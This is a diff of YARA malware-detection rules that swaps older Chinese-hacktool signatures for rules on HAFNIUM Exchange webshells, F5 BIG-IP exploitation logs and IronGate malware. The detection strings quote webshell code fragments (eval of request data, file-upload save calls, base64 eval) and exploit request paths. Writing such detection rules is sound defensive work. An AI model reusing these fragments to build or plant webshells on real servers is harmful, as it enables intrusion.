+		author = "Joe Hannon, Microsoft Threat Intelligence Center (MSTIC)"
+		id = "27677f35-24a3-59cc-a3ad-b83884128da7"
+		date = "2021-03-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L316-L331"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L182-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fb0d4263118faaeed2d68e12fab24c59953e862d"
-		logic_hash = "7d2f3c67fe78028a51ba01c88d7eb62c38fe3c918bb03eee41b6583bc464ad78"
+		logic_hash = "71795ba67bc8a4cea06b93da34b6291029ff74b200e37eb66f6ac51a6ff194cd"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 61
+		tags = "CVE-2021-27065, FILE"
 
 	strings:
-		$s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii
-		$s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii
-		$s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii
+		$script1 = "script language" ascii wide nocase
+		$script2 = "page language" ascii wide nocase
+		$script3 = "runat=\"server\"" ascii wide nocase
+		$script4 = "/script" ascii wide nocase
+		$externalurl = "externalurl" ascii wide nocase
+		$internalurl = "internalurl" ascii wide nocase
+		$internalauthenticationmethods = "internalauthenticationmethods" ascii wide nocase
+		$extendedprotectiontokenchecking = "extendedprotectiontokenchecking" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1360KB and all of them
+		filesize < 50KB and any of ( $script* ) and ( $externalurl or $internalurl ) and $internalauthenticationmethods and $extendedprotectiontokenchecking
 }
-rule SIGNATURE_BASE_Dos_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_3 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file 1.exe"
+		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f1cc1b3-bce2-5a29-849e-ee7deb5e8809"
-		date = "2015-06-13"
+		id = "9c2ba123-63c4-5e9c-a08f-bd9db3304691"
+		date = "2021-03-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L333-L347"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L202-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b554f0687a12ec3a137f321cc15e052ff219f28c"
-		logic_hash = "d4cf3e738743e5402602e045cf590b969dca2d6f7f1bdd57cc398df3392560d9"
-		score = 75
+		logic_hash = "391b366d78c2f24dc006a5365ec232a9a3c2fe0ea514b18897701ceeffcc81ca"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii
-		$s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii
+		$s1 = "runat=\"server\">void Page_Load(object" ascii wide
+		$s2 = "Request.Files[0].SaveAs(Server.MapPath(" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Othertools_Servu : FILE
+rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_4 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file svu.exe"
+		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b750d090-8726-5d21-98ba-6cb050cb7174"
-		date = "2015-06-13"
+		id = "93f5b682-642d-5edf-84a9-296bf12cd72b"
+		date = "2021-03-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L349-L365"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L218-L233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5c64e6879a9746a0d65226706e0edc7a"
-		logic_hash = "fda476bdcc0bb496331ca9f506a1221d401d8671d23f61f1b88219c688163169"
-		score = 75
-		quality = 85
+		logic_hash = "933ab74a0e30e2a728444d491c9eb0ff134db05d905aeb48efe3ba65674a3730"
+		score = 85
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "MZKERNEL32.DLL" fullword ascii
-		$s1 = "UpackByDwing@" fullword ascii
-		$s2 = "GetProcAddress" fullword ascii
-		$s3 = "WriteFile" fullword ascii
+		$s1 = "<%@Page Language=\"Jscript\"%>" ascii wide nocase
+		$s2 = ".FromBase64String(" ascii wide nocase
+		$s3 = "eval(System.Text.Encoding." ascii wide nocase
 
 	condition:
-		uint32( 0 ) == 0x454b5a4d and $s0 at 0 and filesize < 50KB and all of them
+		filesize < 850 and all of them
 }
-rule SIGNATURE_BASE_Ustrrefadd : FILE
+rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_WER_Mar21_1 : CVE_2021_26857 FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ustrrefadd.dll"
+		description = "Detects a Windows Error Report (WER) that indicates and exploitation attempt of the Exchange server as described in CVE-2021-26857 after the corresponding patches have been applied. WER files won't be written upon successful exploitation before applying the patch. Therefore, this indicates an unsuccessful attempt."
 		author = "Florian Roth (Nextron Systems)"
-		id = "e6701e7e-bb15-5e0c-822b-3e29342e083c"
-		date = "2015-06-13"
+		id = "06771101-10ce-5d6b-99f7-a321aade7f69"
+		date = "2021-03-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L367-L384"
+		reference = "https://twitter.com/cyb3rops/status/1368471533048446976"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L235-L250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b371b122460951e74094f3db3016264c9c8a0cfa"
-		logic_hash = "e44f180e081494e28b35b4129eb2c1817ed3e83f23d86f0d3dd4dcf27941cdf1"
-		score = 75
+		logic_hash = "2e135cb47f9fb5ca19ee1058fa6b4f39c098d2dfbab69bc19e80412ab695f126"
+		score = 40
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2021-26857, FILE"
 
 	strings:
-		$s0 = "E-Mail  : admin@luocong.com" fullword ascii
-		$s1 = "Homepage: http://www.luocong.com" fullword ascii
-		$s2 = ": %d  -  " fullword ascii
-		$s3 = "ustrreffix.dll" fullword ascii
-		$s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii
+		$s1 = "AppPath=c:\\windows\\system32\\inetsrv\\w3wp.exe" wide fullword
+		$s7 = ".Value=w3wp#MSExchangeECPAppPool" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 320KB and all of them
+		uint16( 0 ) == 0xfeff and filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_Xscanlib : FILE
+rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_Cab_Recon_Mar21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file XScanLib.dll"
+		description = "Detects suspicious CAB files used by HAFNIUM for recon activity"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1e2cfad-7cbb-51c3-9b55-648c47af641e"
-		date = "2015-06-13"
+		id = "b0caf9d9-af0a-5181-85e4-6091cd6699e3"
+		date = "2021-03-11"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L386-L402"
+		reference = "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3?u=dstepanic"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L252-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
-		logic_hash = "ff18c527df9ff2a4d72bcc5e4905d6f42877d42536edcb13608c6e0e6773aa63"
-		score = 75
+		logic_hash = "de3acb2d01ad14d73263af9e62ef7c715cde259e3f2fbbcbbb41d55589c3f0ab"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "XScanLib.dll" fullword ascii
-		$s6 = "Ports/%s/%d" fullword ascii
-		$s8 = "DEFAULT-TCP-PORT" fullword ascii
-		$s9 = "PlugCheckTcpPort" fullword ascii
+		$s1 = "ip.txt" ascii fullword
+		$s2 = "arp.txt" ascii fullword
+		$s3 = "system" ascii fullword
+		$s4 = "security" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
+		uint32( 0 ) == 0x4643534d and filesize < 10000KB and ( $s1 in ( 0 .. 200 ) and $s2 in ( 0 .. 200 ) and $s3 in ( 0 .. 200 ) and $s4 in ( 0 .. 200 ) )
 }
-rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool : FILE
+rule SIGNATURE_BASE_WEBSHELL_Compiled_Webshell_Mar2021_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file IdtTool.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c157d467-87f8-59d5-a3ba-e4fbeeba767d"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L404-L419"
+		description = "Triggers on temporary pe files containing strings commonly used in webshells."
+		author = "Bundesamt fuer Sicherheit in der Informationstechnik"
+		id = "9336bd2c-791c-5c3e-9733-724a6a23864a"
+		date = "2021-03-05"
+		modified = "2021-03-12"
+		reference = "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L275-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6"
-		logic_hash = "9e14db3721afaba3ea5e9767afff593bf2b137306fe673acd7926bf6efc78391"
+		logic_hash = "d2e5f91f7bb50984c491eb9632d3863febc986760e4d03c8255872887ce4dc4a"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "IdtTool.sys" fullword ascii
-		$s4 = "Idt Tool bY tMd[CsP]" fullword wide
-		$s6 = "\\\\.\\slIdtTool" fullword ascii
+		$x1 = /App_Web_[a-zA-Z0-9]{7,8}.dll/ ascii wide fullword
+		$a1 = "~/aspnet_client/" ascii wide nocase
+		$a2 = "~/auth/" ascii wide nocase
+		$b1 = "JScriptEvaluate" ascii wide fullword
+		$c1 = "get_Request" ascii wide fullword
+		$c2 = "get_Files" ascii wide fullword
+		$c3 = "get_Count" ascii wide fullword
+		$c4 = "get_Item" ascii wide fullword
+		$c5 = "get_Server" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 5KB and filesize < 40KB and all of ( $x* ) and 1 of ( $a* ) and ( all of ( $b* ) or all of ( $c* ) )
 }
-rule SIGNATURE_BASE_Goodtoolset_Ms11046 : FILE
+rule SIGNATURE_BASE_APT_MAL_ASP_DLL_HAFNIUM_Mar21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11046.exe"
+		description = "Detects HAFNIUM compiled ASP.NET DLLs dropped on compromised servers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4703861-02a9-5d93-b6de-c3664ca8abb9"
-		date = "2015-06-13"
+		id = "68b8252e-a07d-5507-b556-a4d473f98157"
+		date = "2021-03-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L421-L438"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L297-L325"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
-		logic_hash = "2fb36a589613f97d0c3a4da58c65352689062a8ba6d432b5f3cf3b51a7e77f8c"
-		score = 75
+		logic_hash = "a4a3f9c7029e67647823a13079655b24648f5e4a7e238439b7a933b19477c20c"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "097f5f700c000a13b91855beb61a931d34fb0abb738a110368f525e25c5bc738"
+		hash2 = "15744e767cbaa9b37ff7bb5c036dda9b653fc54fc9a96fe73fbd639150b3daa3"
+		hash3 = "52ae4de2e3f0ef7fe27c699cb60d41129a3acd4a62be60accc85d88c296e1ddb"
+		hash4 = "5f0480035ee23a12302c88be10e54bf3adbcf271a4bb1106d4975a28234d3af8"
+		hash5 = "6243fd2826c528ee329599153355fd00153dee611ca33ec17effcf00205a6e4e"
+		hash6 = "ebf6799bb86f0da2b05e66a0fe5a9b42df6dac848f4b951b2ed7b7a4866f19ef"
 
 	strings:
-		$s1 = "[*] Token system command" fullword ascii
-		$s2 = "[*] command add user 90sec 90sec" fullword ascii
-		$s3 = "[*] Add to Administrators success" fullword ascii
-		$s4 = "[*] User has been successfully added" fullword ascii
-		$s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$s1 = "Page_Load" ascii fullword
+		$sc1 = { 20 00 3A 00 20 00 68 00 74 00 74 00 70 00 3A 00
+               2F 00 2F 00 (66|67) 00 2F 00 00 89 A3 0D 00 0A 00 }
+		$op1 = { 00 43 00 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f }
+		$op2 = { 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f 00 61 00 }
+		$op3 = { 01 0e 0e 05 20 01 01 11 79 04 07 01 12 2d 04 07 01 12 31 02 }
+		$op4 = { 5e 00 03 00 bc 22 00 00 00 00 01 00 85 03 2b 00 03 00 cc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 840KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* ) or all of ( $op* )
 }
-rule SIGNATURE_BASE_Cmdshell32 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Fileexplorer_Mar21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Cmdshell32.exe"
+		description = "Detects Chopper like ASPX Webshells"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f1dfb5a1-4292-5895-8310-913cfdf4d9d0"
-		date = "2015-06-13"
+		id = "edcaa2a8-6fea-584e-90c2-307a2dfc9f7f"
+		date = "2021-03-31"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L440-L455"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L363-L397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3c41116d20e06dcb179e7346901c1c11cd81c596"
-		logic_hash = "cfe3d72d33d7a3c2b70d4fa0767a921c1cfcd360b2094af40b067789cace95af"
-		score = 75
+		logic_hash = "7b4ffd222b38e76455fff2650b72bdcaff281323103f342b427013cd3fffdc21"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
 
 	strings:
-		$s1 = "cmdshell.exe" fullword wide
-		$s2 = "cmdshell" fullword ascii
-		$s3 = "[Root@CmdShell ~]#" fullword wide
+		$x1 = "<span style=\"background-color: #778899; color: #fff; padding: 5px; cursor: pointer\" onclick=" ascii
+		$xc1 = { 3C 61 73 70 3A 48 69 64 64 65 6E 46 69 65 6C 64
+               20 72 75 6E 61 74 3D 22 73 65 72 76 65 72 22 20
+               49 44 3D 22 ?? ?? ?? ?? ?? 22 20 2F 3E 3C 62 72
+               20 2F 3E 3C 62 72 20 2F 3E 20 50 72 6F 63 65 73
+               73 20 4E 61 6D 65 3A 3C 61 73 70 3A 54 65 78 74
+               42 6F 78 20 49 44 3D }
+		$xc2 = { 22 3E 43 6F 6D 6D 61 6E 64 3C 2F 6C 61 62 65 6C
+               3E 3C 69 6E 70 75 74 20 69 64 3D 22 ?? ?? ?? ??
+               ?? 22 20 74 79 70 65 3D 22 72 61 64 69 6F 22 20
+               6E 61 6D 65 3D 22 74 61 62 73 22 3E 3C 6C 61 62
+               65 6C 20 66 6F 72 3D 22 ?? ?? ?? ?? ?? 22 3E 46
+               69 6C 65 20 45 78 70 6C 6F 72 65 72 3C 2F 6C 61
+               62 65 6C 3E 3C 25 2D 2D }
+		$r1 = "(Request.Form[" ascii
+		$s1 = ".Text + \" Created!\";" ascii
+		$s2 = "DriveInfo.GetDrives()" ascii
+		$s3 = "Encoding.UTF8.GetString(FromBase64String(str.Replace(" ascii
+		$s4 = "encodeURIComponent(btoa(String.fromCharCode.apply(null, new Uint8Array(bytes))));;"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
+		uint16( 0 ) == 0x253c and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_Sniffer_Analyzer_Ssclone_1210_Full_Version : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Chopper_Like_Mar21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"
+		description = "Detects Chopper like ASPX Webshells"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69dac4bf-483d-5888-a748-1a52cf372066"
-		date = "2015-06-13"
+		id = "a4dc1880-865f-5e20-89a2-3a642c453ef9"
+		date = "2021-03-31"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L457-L473"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L399-L416"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e"
-		logic_hash = "982a213a106794e2cddb6148b3d3a119ae17fc318ad03237da1018e1859523d7"
-		score = 75
+		logic_hash = "baa9eb1e3c4ac5ce49d27b1c3f75c8b6590567e25d98761a8b704478f2cee970"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac44513e5ef93d8cbc17219350682c2246af6d5eb85c1b4302141d94c3b06c90"
 
 	strings:
-		$s0 = "http://www.vip80000.com/hot/index.html" fullword ascii
-		$s1 = "GetConnectString" fullword ascii
-		$s2 = "CnCerT.Safe.SSClone.dll" fullword ascii
-		$s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
+		$s1 = "http://f/<script language=\"JScript\" runat=\"server\">var _0x" ascii
+		$s2 = "));function Page_Load(){var _0x" ascii
+		$s3 = ";eval(Request[_0x" ascii
+		$s4 = "','orange','unsafe','" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3580KB and all of them
+		filesize < 3KB and 1 of them or 2 of them
 }
-rule SIGNATURE_BASE_X64_Klock : FILE
+rule SIGNATURE_BASE_LOG_F5_BIGIP_Exploitation_Artefacts_CVE_2021_22986_Mar21_1 : LOG
 {
 	meta:
-		description = "Chinese Hacktool Set - file klock.dll"
+		description = "Detects forensic artefacts indicating successful exploitation of F5 BIG IP appliances as reported by NCCGroup"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7065a4fb-c867-5a94-b6bb-5b60085bea15"
-		date = "2015-06-13"
+		id = "e109ebeb-e5c3-5999-95dc-0963ed8461a6"
+		date = "2021-03-20"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L475-L491"
+		reference = "https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_f5_bigip_cve_2021_22986_log.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
-		logic_hash = "3fe00c08607d20daa055db2f551009ff1c447f1a651d4a78aba91621d53424f5"
-		score = 75
+		logic_hash = "748bb429d4a086e2890773558ea502ef06f507aed5f0f70470e2cd97a3fd5007"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "LOG"
 
 	strings:
-		$s1 = "Bienvenue dans un processus distant" fullword wide
-		$s2 = "klock.dll" fullword ascii
-		$s3 = "Erreur : le bureau courant (" wide
-		$s4 = "klock de mimikatz pour Windows" fullword wide
+		$x1 = "\",\"method\":\"POST\",\"uri\":\"http://localhost:8100/mgmt/tm/util/bash\",\"status\":200," ascii
+		$x2 = "[com.f5.rest.app.RestServerServlet] X-F5-Auth-Token doesn't have value, so skipping" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Dos_Down32 : FILE
+rule SIGNATURE_BASE_Irongate_APT_Step7Prosim_Gen : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Down32.exe"
+		description = "Detects IronGate APT Malware - Step7ProSim DLL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e56c254d-1238-5786-8e8a-f9122b0310a9"
-		date = "2015-06-13"
+		id = "a73cf9e2-c24f-5553-92e2-3a1a882a4a06"
+		date = "2016-06-04"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L493-L508"
+		reference = "https://goo.gl/Mr6M2J"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irongate.yar#L10-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0365738acd728021b0ea2967c867f1014fd7dd75"
-		logic_hash = "c1aaaaaaae2ea720d3fc1516d88d678895bcda81344e8c1f4f57e5a20e770123"
-		score = 75
+		logic_hash = "aab41ada32a8186f958baccad08b60ac1ab686f7561d4dd4471a1e88ddd53730"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0539af1a0cc7f231af8f135920a990321529479f6534c3b64e571d490e1514c3"
+		hash2 = "fa8400422f3161206814590768fc1a27cf6420fc5d322d52e82899ac9f49e14f"
+		hash3 = "5ab1672b15de9bda84298e0bb226265af09b70a9f0b26d6dfb7bdd6cbaed192d"
 
 	strings:
-		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
-		$s6 = "down.exe" fullword wide
-		$s15 = "get_Form1" fullword ascii
+		$x1 = "\\obj\\Release\\Step7ProSim.pdb" ascii
+		$s1 = "Step7ProSim.Interfaces" fullword ascii
+		$s2 = "payloadExecutionTimeInMilliSeconds" fullword ascii
+		$s3 = "PackagingModule.Step7ProSim.dll" fullword wide
+		$s4 = "<KillProcess>b__0" fullword ascii
+		$s5 = "newDllFilename" fullword ascii
+		$s6 = "PackagingModule.exe" fullword wide
+		$s7 = "$863d8af0-cee6-4676-96ad-13e8540f4d47" fullword ascii
+		$s8 = "RunPlcSim" fullword ascii
+		$s9 = "$ccc64bc5-ef95-4217-adc4-5bf0d448c272" fullword ascii
+		$s10 = "InstallProxy" fullword ascii
+		$s11 = "DllProxyInstaller" fullword ascii
+		$s12 = "FindFileInDrive" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 137KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and ( $x1 or 3 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Marathontool_2 : FILE
+rule SIGNATURE_BASE_Irongate_Pyinstaller_Update_EXE : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file MarathonTool.exe"
+		description = "Detects a PyInstaller file named update.exe as mentioned in the IronGate APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20151673-6779-58ce-872c-81e74a96597d"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L510-L525"
+		id = "f8d1b97e-86d9-547f-a212-a84fb068af3c"
+		date = "2016-06-04"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/Mr6M2J"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irongate.yar#L42-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c"
-		logic_hash = "7581b63a7bddeac93c65b2943b9f5f568464d8f300bc7385ca73880996bd390b"
-		score = 75
+		logic_hash = "b55e02af900b3510743502bd72d5e14c9235985b5a7b05def0f5c462b28f2216"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2044712ceb99972d025716f0f16aa039550e22a63000d2885f7b7cd50f6834e0"
 
 	strings:
-		$s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide
-		$s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide
-		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
+		$s1 = "bpython27.dll" fullword ascii
+		$s5 = "%s%s.exe" fullword ascii
+		$s6 = "bupdate.exe.manifest" fullword ascii
+		$s9 = "bunicodedata.pyd" fullword ascii
+		$s11 = "distutils.sysconfig(" ascii
+		$s16 = "distutils.debug(" ascii
+		$s18 = "supdate" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Scanms_Scanms : FILE
+rule SIGNATURE_BASE_Nirsoft_Netresview : FILE
 {
 	meta:
